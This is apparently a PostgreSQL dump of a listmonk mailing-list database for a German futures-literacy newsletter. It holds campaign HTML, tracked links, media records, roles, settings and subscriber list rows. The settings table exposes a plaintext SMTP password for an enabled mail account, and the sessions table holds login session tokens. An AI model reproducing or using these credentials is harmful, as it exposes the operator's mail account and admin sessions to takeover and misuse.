29 2 \N 2026-04-28 09:39:37.849242+02
30 2 \N 2026-04-28 09:52:23.594578+02
31 2 \N 2026-04-28 09:54:36.467822+02
32 2 \N 2026-04-28 09:55:19.500925+02
33 2 \N 2026-04-28 09:56:07.167438+02
34 2 \N 2026-04-28 09:56:24.007247+02
35 2 \N 2026-04-28 09:57:03.308953+02
36 2 \N 2026-04-28 09:57:39.976228+02
37 2 \N 2026-04-28 09:59:03.21806+02
38 2 \N 2026-04-28 10:01:09.679619+02
39 2 \N 2026-04-28 10:01:16.929112+02
40 2 \N 2026-04-28 10:01:47.438806+02
41 2 \N 2026-04-28 10:03:30.84439+02
42 2 \N 2026-04-28 10:03:38.522041+02
43 2 \N 2026-04-28 10:03:48.418158+02
44 2 \N 2026-04-28 10:04:15.565235+02
45 2 \N 2026-04-28 10:04:22.30867+02
46 2 \N 2026-04-28 10:04:50.932567+02
47 2 \N 2026-04-28 10:05:11.031026+02
48 2 \N 2026-04-28 10:06:20.456641+02
49 2 \N 2026-04-28 10:06:37.858257+02
50 2 \N 2026-04-28 10:06:40.59408+02
51 2 \N 2026-04-28 10:06:54.282713+02
52 2 \N 2026-04-28 10:07:00.419929+02
53 2 \N 2026-04-28 10:07:04.233236+02
54 2 \N 2026-04-28 10:07:14.74772+02
55 2 \N 2026-04-28 10:07:15.599863+02
56 2 \N 2026-04-28 10:07:19.813897+02
57 2 \N 2026-04-28 10:07:35.75815+02
58 2 \N 2026-04-28 10:07:36.675372+02
59 2 \N 2026-04-28 10:08:17.026071+02
60 2 \N 2026-04-28 10:08:44.952934+02
61 2 \N 2026-04-28 10:09:25.723177+02
62 2 \N 2026-04-28 10:10:19.805144+02
63 2 \N 2026-04-28 10:10:39.425529+02
64 2 \N 2026-04-28 10:11:06.669039+02
65 2 \N 2026-04-28 10:11:16.36622+02
66 2 \N 2026-04-28 10:11:22.289413+02
67 2 \N 2026-04-28 10:11:32.853382+02
68 2 \N 2026-04-28 10:11:38.383218+02
69 2 \N 2026-04-28 10:11:46.4176+02
70 2 \N 2026-04-28 10:11:49.704463+02
71 2 \N 2026-04-28 10:11:58.072117+02
72 2 \N 2026-04-28 10:12:05.128631+02
73 2 \N 2026-04-28 10:12:09.665211+02
74 2 \N 2026-04-28 10:12:32.923045+02
75 2 \N 2026-04-28 10:12:34.46414+02
76 2 \N 2026-04-28 10:12:42.98769+02
77 2 \N 2026-04-28 10:12:52.189767+02
78 2 \N 2026-04-28 10:12:55.293606+02
79 2 \N 2026-04-28 10:12:56.923525+02
80 2 \N 2026-04-28 10:13:20.536652+02
81 2 \N 2026-04-28 10:13:31.984832+02
82 2 \N 2026-04-28 10:13:39.464824+02
83 2 \N 2026-04-28 10:13:41.253736+02
84 2 \N 2026-04-28 10:13:50.067238+02
85 2 \N 2026-04-28 10:13:51.45425+02
86 2 \N 2026-04-28 10:13:56.406745+02
87 2 \N 2026-04-28 10:14:07.42006+02
88 2 \N 2026-04-28 10:14:08.082664+02
89 2 \N 2026-04-28 10:14:17.593469+02
90 2 \N 2026-04-28 10:14:20.093631+02
91 2 \N 2026-04-28 10:14:25.597456+02
92 2 \N 2026-04-28 10:14:26.226099+02
93 2 \N 2026-04-28 10:14:45.808886+02
94 2 \N 2026-04-28 10:14:53.946939+02
95 2 \N 2026-04-28 10:15:01.33144+02
96 2 \N 2026-04-28 10:15:15.424678+02
97 2 \N 2026-04-28 10:15:20.109071+02
98 2 \N 2026-04-28 10:15:37.098898+02
99 2 \N 2026-04-28 10:16:43.88725+02
100 2 \N 2026-04-28 10:17:44.232445+02
101 2 \N 2026-04-28 10:17:52.388155+02
102 2 \N 2026-04-28 10:17:53.145817+02
103 2 \N 2026-04-28 10:18:12.902165+02
104 2 \N 2026-04-28 10:18:22.34322+02
105 2 \N 2026-04-28 10:18:26.050498+02
106 2 \N 2026-04-28 10:21:19.200428+02
107 2 550 2026-04-29 19:50:02.879999+02
108 2 550 2026-04-29 22:21:22.922653+02
\.
--
-- Data for Name: campaigns; Type: TABLE DATA; Schema: public; Owner: monkeyrelevy_0
--
COPY public.campaigns (id, uuid, name, subject, from_email, body, body_source, altbody, content_type, send_at, headers, attribs, status, tags, type, messenger, template_id, to_send, sent, max_subscriber_id, last_subscriber_id, archive, archive_slug, archive_template_id, archive_meta, started_at, created_at, updated_at) FROM stdin;
1 55a8188c-f410-43a4-83ec-36ce83e20f35 Test campaign Welcome to listmonk No Reply <noreply@yoursite.com> <h3>Hi {{ .Subscriber.FirstName }}!</h3>\n\t\t<p>This is a test e-mail campaign. Your second name is {{ .Subscriber.LastName }} and you are from {{ .Subscriber.Attribs.city }}.</p>\n\t\t<p>Here is a <a href="https://listmonk.app@TrackLink">tracked link</a>.</p>\n\t\t<p>Use the link icon in the editor toolbar or when writing raw HTML or Markdown,\n\t\t\tsimply suffix @TrackLink to the end of a URL to turn it into a tracking link. Example:</p>\n\t\t<pre><a href="https:/‌/listmonk.app@TrackLink"></a></pre>\n\t\t<p>For help, refer to the <a href="https://listmonk.app/docs">documentation</a>.</p>\n\t\t \N \N richtext \N [] {} draft {test-campaign} regular email 5 0 0 0 0 f welcome-to-listmonk \N {"name": "Subscriber"} \N 2026-03-22 10:59:01.039307+01 2026-03-22 10:59:01.039307+01
3 4c7d6d60-3346-423a-8552-bd24f730ad43 Newsletter_2026-06 Neuer Futures Literacy Navigator; Young Futures Europe; Weiterbildungen Newsletter Zukünftebildung <newsletter@zukuenfte.net> <div style="background-color: #f5f5f5; color: #262626; font-family: 'Helvetica Neue', 'Arial Nova', 'Nimbus Sans', Arial, sans-serif; font-size: 16px; font-weight: 400; letter-spacing: 0.15008px; line-height: 1.5; margin: 0; padding: 32px 0; min-height: 100%; width: 100%;">\n<table style="margin: 0 auto; max-width: 600px; background-color: #ffffff;" role="presentation" border="0" width="100%" cellspacing="0" cellpadding="0" align="center">\n<tbody>\n<tr style="width: 100%;">\n<td>\n<div style="padding: 16px 24px 16px 24px;">\n<p><img src="https://newsletter.zukuenfte.net/uploads/2026-06-FLNavigator.jpg" alt="" width="552" height="276" /></p>\n<p><strong> Liebe Zukünfte-Interessierte, dear Futures-community, </strong></p>\n<p>ein neues Projekt aus dem deutschen Zukünfte-Netzwerk ist der Futures Literacy Navigator. Er erlaubt es, den großen Reichtum an Materialien rund um Zukünftebildung (Futures Literacy) passend zum eigenen Bedarf zu filtern: nach Sprache, nach Niveau, nach Fokus, nach Autor usw. </p>\n<p><a href="https://futuresglossary.net/?lang=de" target="_blank" rel="noopener">Zum Futures Literacy Navigator</a></p>\n<p><img src="https://newsletter.zukuenfte.net/uploads/2026-06-Young-Futures.jpg" alt="" width="750" height="450" /></p>\n<p><strong><em>Erasmus+ Young Futures</em></strong></p>\n<p>Im März begann das neue Young Futures Europe Projekt, an dem einige Mitglieder des deutschen Zukünfte-Netzwerks beteiligt sind. In vier Ländern wird die Zukünftebildung in der Jugendarbeit gestärkt.</p>\n<p><a href="https://young-futures.eu/de@TrackLink" target="_blank" rel="noopener">Alle Details zum Projekt »</a></p>\n<p><img src="https://newsletter.zukuenfte.net/uploads/2026-06-Summerschool.jpg" alt="" width="751" height="450" /></p>\n<p><strong><em>Futures Literacy, Klima & Design </em></strong></p>\n<p>Ende Juli gibt es in Burghausen eine Summer School zu Futures Literacy in der Kunst & Architektur Akademie. Sie wird geleitet u.a. von Bruno Gandlgruber und Jonathon Keats aus dem globalen Futues Literacy Netzwerk. </p>\n<p><a href="https://kunst.burghausen.de/summerschool/@TrackLink">Zu Programm und Anmeldung »</a></p>\n<p><img src="https://listmonk.relevantive.de/uploads/Weiterbildung_2026_Haeder.jpg" alt="" /></p>\n<p><strong> <em> Weiterbildung Zukünftelabore </em> </strong></p>\n<p>Die Methode des Zukünftelabors ist eine wichtige Möglichkeit, die Kompetenz der Zukünftebildung zu stärken und Innovationen zu ermöglichen. Im Herbst kann man den Umgang damit wieder in einer online Weiterbildung erlernen.</p>\n<p><a href="https://www.eventbrite.de/e/weiterbildung-zukunftelabore-tickets-1987194508268" target="_blank" rel="noopener">Zu Ablauf, Zielen und Kosten »</a></p>\n<p><img src="https://newsletter.zukuenfte.net/uploads/2026-06-Machart.jpg" alt="" width="750" height="450" /></p>\n<p><strong><em>Weiterbildung Future Narratives</em></strong></p>\n<p>Die Weiterbildung von machart im November 2026 in Krefeld verbindet Ansätze von Zukünftebildung und Storytelling handlungsnah für die berufliche Praxis - für alle, die Prozesse kreativ gestalten und Zukunft aktiv und innovativ denken wollen.</p>\n<p><a href="https://www.eventbrite.de/e/weiterbildung-zukunftelabore-tickets-1987194508268" target="_blank" rel="noopener">Zu Ablauf, Zielen und Kosten »</a></p>\n<p> </p>\n<p><img src="https://newsletter.zukuenfte.net/uploads/2026-06-University-Futures.jpg" alt="" width="750" height="450" /></p>\n<p><strong><em>Futures Literacy an Hochschulen I</em> </strong></p>\n<p>Auf dem University Future Festival werden Nicole Behringer, Aneglika Neudecker und Stefan Bergheim am 23. Juni in Braunschweig aufzeigen, was Futures Literacy ist, und wie man die Kompetenz an Hochschulen verankern kann.</p>\n<p><a href="https://festival.hfd.digital/de/programm-2026/programm-23-06-2026/@TrackLink">Zum Festival »</a></p>\n<p><img src="https://newsletter.zukuenfte.net/uploads/2026-06-Boccioni_-_Visioni_simultanee.jpg" alt="" width="750" height="449" /></p>\n<p><strong><em>Futures Literacy an Hochschulen II</em></strong></p>\n<p>An der Universität Hildesheim gibt es neu einen "Co-Creation Hub for Futures Literacy" und an der Hochschule für nachhaltige Entwicklung Eberswalde ein Forschungsprojekt, das Zukunftsdenken und Soziales Unternehmertum verbindet.</p>\n<p><a href="https://www.uni-hildesheim.de/futures-hub/@TrackLink">Zum Co-Creation Hub »</a> <a href="https://www.hnee.de/forschung/projekte/futura@TrackLink" target="_blank" rel="noopener">Zu FUTURA »</a></p>\n</div>\n</td>\n</tr>\n</tbody>\n</table>\n</div> \N \N richtext \N [] {} draft \N regular email 5 0 0 0 0 f \N \N {} \N 2026-06-13 11:57:21.13876+02 2026-06-14 15:47:02.639044+02
2 e8807bcc-ed7e-4c6f-88e9-18341a8ad90f Newsletter_2026-04 Neues Zukünfteglossar: Die ersten Einträge sind öffentlich Newsletter Zukünftebildung <newsletter@zukuenfte.net> <table width="560" cellpadding="0" cellspacing="0" border="0" style="width:560px;">\n <tr>\n <td align="center" style="padding:0 0 20px 0;">\n <img src="https://listmonk.relevantive.de/uploads/2026-04-23_GlossarHome.jpg"\n width="560"\n style="width:560px;height:auto;display:block;border:0;">\n </td>\n </tr>\n</table>\n\n<table width="560" cellpadding="0" cellspacing="0" border="0" style="width:560px;">\n <tr>\n <td style="padding:0 0 20px 0;font-family:Arial,Helvetica,sans-serif;font-size:15px;line-height:24px;color:#444444;">\n <p style="margin:0 0 12px 0;"><strong>Liebe Zukünfte-Interessierte, dear Futures-community,</strong></p>\n\n <p style="margin:0 0 18px 0;">\n aus dem deutschen Zukünfte-Netzwerk heraus ist seit dem Treffen in Schweinfurt Ende 2024 ein mehrsprachiges Zukünfteglossar entstanden. Die ersten fünf Einträge sind nun in den ersten beiden Sprachen öffentlich zugänglich: Annahme, Wahrscheinlichkeit, Resilienz, Verantwortung und Unsicherheit. Bald folgen Antizipation, Komplexität, Vorausschau und Imagination.\n </p>\n\n <table cellpadding="0" cellspacing="0" border="0" align="center">\n <tr>\n <td bgcolor="#6C6C6C" style="padding:10px 18px;background:#6C6C6C;">\n <a href="https://futuresglossary.net/?lang=de"\n style="font-family:Arial,Helvetica,sans-serif;color:#ffffff;text-decoration:none;font-size:14px;line-height:16px;display:block;">\n Zum Zukünfteglossar bzw. Futures Glossary\n </a>\n </td>\n </tr>\n </table>\n </td>\n </tr>\n</table>\n\n<table width="560" cellpadding="0" cellspacing="0" border="0" style="width:560px;">\n <tr>\n <td width="265" valign="top" style="width:265px;font-family:Arial,Helvetica,sans-serif;font-size:14px;line-height:22px;color:#444444;">\n <img src="https://listmonk.relevantive.de/uploads/2026-06-Offen_Demokratie-Header.jpg"\n width="265"\n style="width:265px;height:auto;display:block;border:0;">\n <p style="margin:12px 0 8px 0;"><strong><em>Offenes Labor zu Demokratie</em></strong></p>\n <p style="margin:0 0 10px 0;">\n Am 19. Juni gibt es wieder die Gelegenheit, ein Zukünftelabor selbst zu erleben: Erwartungen und Wünsche aufdecken, alternative Zukünfte entwickeln usw. Diesmal geht es um das große Thema Demokratie.\n </p>\n <p style="margin:0;">\n <a href="https://www.eventbrite.de/e/zukunftelabor-die-zukunfte-der-demokratie-tickets-1985752342712" style="color:#007C89;text-decoration:underline;">Alle Details und Anmeldung »</a>\n </p>\n </td>\n\n <td width="30" style="width:30px;font-size:1px;line-height:1px;"> </td>\n\n <td width="265" valign="top" style="width:265px;font-family:Arial,Helvetica,sans-serif;font-size:14px;line-height:22px;color:#444444;">\n <img src="https://listmonk.relevantive.de/uploads/Weiterbildung_2026_Haeder.jpg"\n width="265"\n style="width:265px;height:auto;display:block;border:0;">\n <p style="margin:12px 0 8px 0;"><strong><em>Weiterbildung Zukünftelabore</em></strong></p>\n <p style="margin:0 0 10px 0;">\n Die Methode des Zukünftelabors ist eine wichtige Möglichkeit, die Kompetenz der Zukünftebildung zu stärken und Innovationen zu ermöglichen. Im Herbst kann man den Umgang damit wieder in einer online Weiterbildung erlernen.\n </p>\n <p style="margin:0;">\n <a href="https://www.eventbrite.de/e/weiterbildung-zukunftelabore-tickets-1987194508268" style="color:#007C89;text-decoration:underline;">Zu Ablauf, Zielen und Kosten »</a>\n </p>\n </td>\n </tr>\n</table> \N \N html \N [] {} finished \N regular email 5 528 528 548 548 t \N \N {} 2026-04-28 09:27:52.868747+02 2026-04-12 10:10:41.276365+02 2026-06-15 08:31:11.072383+02
\.
--
-- Data for Name: link_clicks; Type: TABLE DATA; Schema: public; Owner: monkeyrelevy_0
--
COPY public.link_clicks (id, campaign_id, link_id, subscriber_id, created_at) FROM stdin;
\.
--
-- Data for Name: links; Type: TABLE DATA; Schema: public; Owner: monkeyrelevy_0
--
COPY public.links (id, uuid, url, created_at) FROM stdin;
1 c1065163-4e36-4aa2-97e3-af64e30d1aba https://young-futures.eu/de 2026-06-13 13:02:50.196578+02
2 47112267-1183-42a8-88fc-c29092438012 https://kunst.burghausen.de/summerschool/ 2026-06-13 13:02:50.201042+02
5 83e5a3ad-09c6-4eff-a7d1-e63b3e29e5d9 https://festival.hfd.digital/de/programm-2026/programm-23-06-2026/ 2026-06-14 15:46:34.514614+02
6 af7a6403-2d86-45b6-ba71-0b513eea0b64 https://www.uni-hildesheim.de/futures-hub/ 2026-06-14 15:46:34.518318+02
7 58592c83-1322-4371-93a5-0fd12770a504 https://www.hnee.de/forschung/projekte/futura 2026-06-14 15:46:34.521606+02
\.
--
-- Data for Name: lists; Type: TABLE DATA; Schema: public; Owner: monkeyrelevy_0
--
COPY public.lists (id, uuid, name, type, optin, status, tags, description, created_at, updated_at) FROM stdin;
3 19e19358-5777-4cbc-ba64-9dc7a1a1e214 Zukuenfte-Newsletter public double active \N 2026-03-31 16:30:53.717655+02 2026-04-27 17:53:46.834605+02
\.
--
-- Data for Name: media; Type: TABLE DATA; Schema: public; Owner: monkeyrelevy_0
--
COPY public.media (id, uuid, provider, filename, content_type, thumb, meta, created_at) FROM stdin;
1 b0c8727a-f99c-4147-88ba-c5fb9f021e7c filesystem bg-brush.jpg image/jpeg thumb_bg-brush.jpg {"width": 1200, "height": 141} 2026-04-26 07:25:58.340149+02
2 0b9c751a-3aba-430f-b213-51bacbd94972 filesystem 2026-04-23_GlossarHome.jpg image/jpeg thumb_2026-04-23_GlossarHome.jpg {"width": 2160, "height": 1080} 2026-04-26 07:34:32.824946+02
3 ab438ca0-7d54-4614-811a-0a9578e1929e filesystem 2026-06-Offen_Demokratie-Header.jpg image/jpeg thumb_2026-06-Offen_Demokratie-Header.jpg {"width": 750, "height": 450} 2026-04-26 07:48:41.528858+02
4 b55a85e1-3ef4-4829-a0cf-cbdd3106d3b9 filesystem Weiterbildung_2026_Haeder.jpg image/jpeg thumb_Weiterbildung_2026_Haeder.jpg {"width": 750, "height": 450} 2026-04-26 07:49:10.416121+02
5 62c118a4-6b70-485f-b981-70686c59f629 filesystem 2026-06-Young-Futures.jpg image/jpeg thumb_2026-06-Young-Futures.jpg {"width": 750, "height": 450} 2026-06-13 12:27:15.258997+02
6 f350c089-470a-466e-aae8-24c62d840ace filesystem 2026-06-Machart.jpg image/jpeg thumb_2026-06-Machart.jpg {"width": 750, "height": 450} 2026-06-13 12:47:39.788128+02
7 5dda735a-3218-43f9-b9cd-b8bf81ab47e7 filesystem 2026-06-Summerschool.jpg image/jpeg thumb_2026-06-Summerschool.jpg {"width": 751, "height": 450} 2026-06-13 12:47:39.846169+02
8 deaf7986-776f-46f4-9e6e-25224eadc648 filesystem 2026-06-FLNavigator.jpg image/jpeg thumb_2026-06-FLNavigator.jpg {"width": 2160, "height": 1080} 2026-06-13 12:52:54.766126+02
9 9b026fb9-757e-4dee-8eae-0a95d7b02281 filesystem 2026-06-University-Futures.jpg image/jpeg thumb_2026-06-University-Futures.jpg {"width": 750, "height": 450} 2026-06-14 15:45:29.504447+02
10 0d43f435-5f3b-4e6c-b72c-2fa9a8f88fab filesystem 2026-06-Boccioni_-_Visioni_simultanee.jpg image/jpeg thumb_2026-06-Boccioni_-_Visioni_simultanee.jpg {"width": 750, "height": 449} 2026-06-14 15:45:29.595731+02
\.
--
-- Data for Name: roles; Type: TABLE DATA; Schema: public; Owner: monkeyrelevy_0
--
COPY public.roles (id, type, parent_id, list_id, permissions, name, created_at, updated_at) FROM stdin;
1 user \N \N {settings:maintain,lists:get_all,lists:manage_all,subscribers:sql_query,campaigns:manage,templates:get,templates:manage,subscribers:manage,tx:send,campaigns:get,campaigns:manage_all,bounces:get,users:manage,roles:get,settings:get,subscribers:get,subscribers:import,campaigns:get_all,bounces:manage,media:get,media:manage,users:get,settings:manage,subscribers:get_all,campaigns:get_analytics,webhooks:post_bounce,roles:manage} Super Admin 2026-03-22 11:04:50.950677+01 2026-03-22 11:04:50.950677+01
\.
--
-- Data for Name: sessions; Type: TABLE DATA; Schema: public; Owner: monkeyrelevy_0
--
COPY public.sessions (id, data, created_at) FROM stdin;
lISr9f0WivzjMmHI99W0dXHiiFqrFEBDHXiHes9vozkQV0NVywaBVu58lgvb6tJv {"user_id": 2, "oidc_token": ""} 2026-06-14 10:25:55.708946
lm706f9CyiQdWh2O0HRvkwQMpaekLis785R9W83lsXKH8e5eyBwhT8Mq6PCJHUJG {"user_id": 1, "oidc_token": ""} 2026-06-15 08:30:03.468892
\.
--
-- Data for Name: settings; Type: TABLE DATA; Schema: public; Owner: monkeyrelevy_0
--
COPY public.settings (key, value, updated_at) FROM stdin;
smtp [{"host": "mail.your-server.de", "name": "email-zuk-nftebildung", "port": 465, "uuid": "c0cea38e-a04d-44e2-a3a8-c56de492dd63", "enabled": true, "password": "tranken996.Belieber", "tls_type": "TLS", "username": "newsletter@young-futures.eu", "max_conns": 10, "idle_timeout": "15s", "wait_timeout": "5s", "auth_protocol": "plain", "email_headers": [], "hello_hostname": "", "max_msg_retries": 2, "tls_skip_verify": false}, {"host": "smtp.gmail.com", "name": "", "port": 465, "uuid": "f52a55a4-995e-498b-adf6-2bcd1b53f235", "enabled": false, "password": "password", "tls_type": "TLS", "username": "username@gmail.com", "max_conns": 10, "idle_timeout": "15s", "wait_timeout": "5s", "auth_protocol": "login", "email_headers": [], "hello_hostname": "", "max_msg_retries": 2, "tls_skip_verify": false}] 2026-03-22 10:59:00.638519+01
app.lang "en" 2026-03-22 10:59:00.638519+01
messengers [] 2026-03-22 10:59:00.638519+01
app.logo_url "" 2026-03-22 10:59:00.638519+01
app.root_url "https://newsletter.zukuenfte.net" 2026-03-22 10:59:00.638519+01
app.site_name "Mailing list" 2026-03-22 10:59:00.638519+01
security.oidc {"enabled": false, "client_id": "", "provider_url": "", "client_secret": "", "provider_name": "", "auto_create_users": false, "default_list_role_id": null, "default_user_role_id": null} 2026-03-22 10:59:00.638519+01
upload.s3.url "https://ap-south-1.s3.amazonaws.com" 2026-03-22 10:59:00.638519+01
app.batch_size 1000 2026-03-22 10:59:00.638519+01
upload.max_file_size 5000 2026-03-22 10:59:00.638519+01
upload.s3.aws_secret_access_key "" 2026-03-22 10:59:00.638519+01
migrations ["v6.0.0"] 2026-03-22 10:59:00.715885+01
security.captcha {"altcha": {"enabled": false, "complexity": 300000}, "hcaptcha": {"key": "", "secret": "", "enabled": false}} 2026-03-22 10:59:00.638519+01
upload.s3.expiry "167h" 2026-03-22 10:59:00.638519+01
app.check_updates true 2026-03-22 10:59:00.638519+01
app.notify_emails [] 2026-03-22 10:59:00.638519+01
upload.extensions ["jpg", "jpeg", "png", "gif", "svg", "*"] 2026-03-22 10:59:00.638519+01
bounce.ses_enabled false 2026-03-22 10:59:00.638519+01
privacy.allow_wipe true 2026-03-22 10:59:00.638519+01
privacy.exportable ["profile", "subscriptions", "campaign_views", "link_clicks"] 2026-03-22 10:59:00.638519+01
app.max_send_errors 1000 2026-03-22 10:59:00.638519+01
bounce.forwardemail {"key": "", "enabled": false} 2026-03-22 10:59:00.638519+01
bounce.sendgrid_key "" 2026-03-22 10:59:00.638519+01
privacy.allow_export true 2026-03-22 10:59:00.638519+01
upload.s3.public_url "" 2026-03-22 10:59:00.638519+01
security.cors_origins [] 2026-03-22 10:59:00.638519+01
upload.s3.bucket_path "/" 2026-03-22 10:59:00.638519+01
upload.s3.bucket_type "public" 2026-03-22 10:59:00.638519+01
app.cache_slow_queries false 2026-03-22 10:59:00.638519+01
bounce.sendgrid_enabled false 2026-03-22 10:59:00.638519+01
bounce.webhooks_enabled false 2026-03-22 10:59:00.638519+01
privacy.allow_blocklist true 2026-03-22 10:59:00.638519+01
privacy.record_optin_ip false 2026-03-22 10:59:00.638519+01
upload.s3.bucket_domain "" 2026-03-22 10:59:00.638519+01
privacy.domain_allowlist [] 2026-03-22 10:59:00.638519+01
privacy.domain_blocklist [] 2026-03-22 10:59:00.638519+01
app.from_email "newsletter <newsletter@zukuenfte.net>" 2026-03-22 10:59:00.638519+01
bounce.actions {"hard": {"count": 1, "action": "blocklist"}, "soft": {"count": 2, "action": "none"}, "complaint": {"count": 1, "action": "blocklist"}} 2026-03-22 10:59:00.638519+01
bounce.enabled false 2026-03-22 10:59:00.638519+01
maintenance.db {"vacuum": false, "vacuum_cron_interval": "0 2 * * *"} 2026-03-22 10:59:00.638519+01
app.concurrency 10 2026-03-22 10:59:00.638519+01
app.favicon_url "" 2026-03-22 10:59:00.638519+01
bounce.postmark {"enabled": false, "password": "", "username": ""} 2026-03-22 10:59:00.638519+01
upload.provider "filesystem" 2026-03-22 10:59:00.638519+01
app.message_rate 10 2026-03-22 10:59:00.638519+01
bounce.mailboxes [{"host": "pop.yoursite.com", "port": 995, "type": "pop", "uuid": "77f961e4-77f0-473f-a58f-fa202f13c390", "enabled": false, "password": "password", "username": "username", "return_path": "bounce@listmonk.yoursite.com", "tls_enabled": true, "auth_protocol": "userpass", "scan_interval": "15m", "tls_skip_verify": false}] 2026-03-22 10:59:00.638519+01
upload.s3.bucket "" 2026-03-22 10:59:00.638519+01
appearance.public.custom_css "body {\\n background: #f5f5f5 !important;\\n font-family: Arial, Helvetica, sans-serif !important;\\n}\\n\\n.container.wrap {\\n max-width: 640px !important;\\n margin: 40px auto !important;\\n padding: 32px !important;\\n background: #ffffff !important;\\n border-radius: 16px !important;\\n box-shadow: 0 8px 30px rgba(0,0,0,.08) !important;\\n}\\n\\n.header .logo img {\\n display: none !important;\\n}\\n\\n.header .logo::after {\\n content: \\"Newsletter Zukünfte.net\\";\\n display: block;\\n text-align: center;\\n font-size: 30px;\\n font-weight: 700;\\n color: #333333;\\n margin-bottom: 8px;\\n}\\n\\n.header .logo::before {\\n content: \\"News about Futures Literacy\\";\\n display: block;\\n text-align: center;\\n font-size: 17px;\\n font-style: italic;\\n color: #666666;\\n margin-bottom: 24px;\\n}\\n\\nsection > h2 {\\n visibility: hidden;\\n height: 0;\\n margin: 0;\\n}\\n\\n\\n\\nlabel {\\n font-weight: 600 !important;\\n color: #444444 !important;\\n}\\n\\ninput[type=\\"email\\"],\\ninput[type=\\"text\\"] {\\n width: 100% !important;\\n box-sizing: border-box !important;\\n padding: 12px !important;\\n border: 1px solid #cccccc !important;\\n border-radius: 8px !important;\\n font-size: 16px !important;\\n}\\n\\nul.lists {\\n list-style: none !important;\\n padding-left: 0 !important;\\n}\\n\\nul.lists h2 {\\n font-size: 18px !important;\\n color: #333333 !important;\\n}\\n\\nbutton.button {\\n background: #6C6C6C !important;\\n color: #ffffff !important;\\n border: 0 !important;\\n border-radius: 8px !important;\\n padding: 12px 22px !important;\\n font-size: 16px !important;\\n cursor: pointer !important;\\n}\\n\\nbutton.button:hover {\\n background: #555555 !important;\\n}\\n\\n.right a {\\n color: #007C89 !important;\\n}" 2026-03-22 10:59:00.638519+01
app.enable_public_archive_rss_content true 2026-03-22 10:59:00.638519+01
app.enable_public_archive true 2026-03-22 10:59:00.638519+01
privacy.allow_preferences true 2026-03-22 10:59:00.638519+01
app.message_sliding_window false 2026-03-22 10:59:00.638519+01
appearance.admin.custom_js "" 2026-03-22 10:59:00.638519+01
privacy.unsubscribe_header true 2026-03-22 10:59:00.638519+01
app.send_optin_confirmation true 2026-03-22 10:59:00.638519+01
appearance.admin.custom_css "" 2026-03-22 10:59:00.638519+01
appearance.public.custom_js "" 2026-03-22 10:59:00.638519+01
privacy.individual_tracking true 2026-03-22 10:59:00.638519+01
upload.s3.aws_access_key_id "" 2026-03-22 10:59:00.638519+01
upload.filesystem.upload_uri "/uploads" 2026-03-22 10:59:00.638519+01
upload.s3.aws_default_region "ap-south-1" 2026-03-22 10:59:00.638519+01
upload.filesystem.upload_path "uploads" 2026-03-22 10:59:00.638519+01
app.cache_slow_queries_interval "0 3 * * *" 2026-03-22 10:59:00.638519+01
app.message_sliding_window_rate 10000 2026-03-22 10:59:00.638519+01
app.enable_public_subscription_page true 2026-03-22 10:59:00.638519+01
app.message_sliding_window_duration "1h" 2026-03-22 10:59:00.638519+01
\.
--
-- Data for Name: subscriber_lists; Type: TABLE DATA; Schema: public; Owner: monkeyrelevy_0
--
COPY public.subscriber_lists (subscriber_id, list_id, meta, status, created_at, updated_at) FROM stdin;
3 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
4 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
5 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
6 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
7 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
8 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
9 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
10 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
11 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
12 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
13 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
14 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
15 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
16 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
17 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
18 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
19 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
20 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
21 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
22 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
23 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
24 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
25 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
26 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
27 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
28 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
29 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
30 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
31 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
32 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
33 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
34 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
35 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
36 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
37 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
38 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
